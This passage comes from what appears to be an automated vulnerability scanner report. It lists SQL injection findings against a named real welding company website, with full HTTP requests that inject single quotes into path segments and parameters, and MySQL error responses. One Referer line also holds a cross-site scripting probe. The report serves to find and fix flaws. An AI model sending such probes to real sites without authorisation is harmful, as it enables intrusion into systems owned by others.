<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:41 GMT
Connection: Keep-Alive
Content-Length: 15803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.91. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:51 GMT
Connection: Keep-Alive
Content-Length: 27752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images/powerline_bg.png''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:52 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.92. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:44 GMT
Connection: Keep-Alive
Content-Length: 27720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:45 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.93. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

1.94. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-bootm-bg.jpg'?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

1.95. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

1.96. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-top-bg.jpg'?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

1.97. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:11 GMT
Connection: Keep-Alive
Content-Length: 27713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

1.98. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/header-background.jpg'?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:14 GMT
Connection: Keep-Alive
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

1.99. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /landing'/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:03:45 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=9905841C246A3A99C9CE2CAD5451F256; path=/
Content-Length: 27866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_con' at line 1)<br>
...[SNIP]...

1.100. http://www.millerwelds.com/landing/drive/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /landing/drive'/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:04:11 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=D039342996A35FFDFB087F94CB6EE307; path=/
Content-Length: 27865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_con' at line 1)<br>
...[SNIP]...

1.101. http://www.millerwelds.com/landing/drive/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online&1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:56 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=E444AE3598B28A98BE68F16717293482; path=/
Content-Length: 14910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online&1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:58 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=9905841C246A3A99C9CE2CAD5451F256; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.102. http://www.millerwelds.com/landing/drive/ [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The utm_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_campaign parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive'&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:43 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=33DA6723A49CE218C1D7BD1E4A7A789A; path=/
Content-Length: 14906

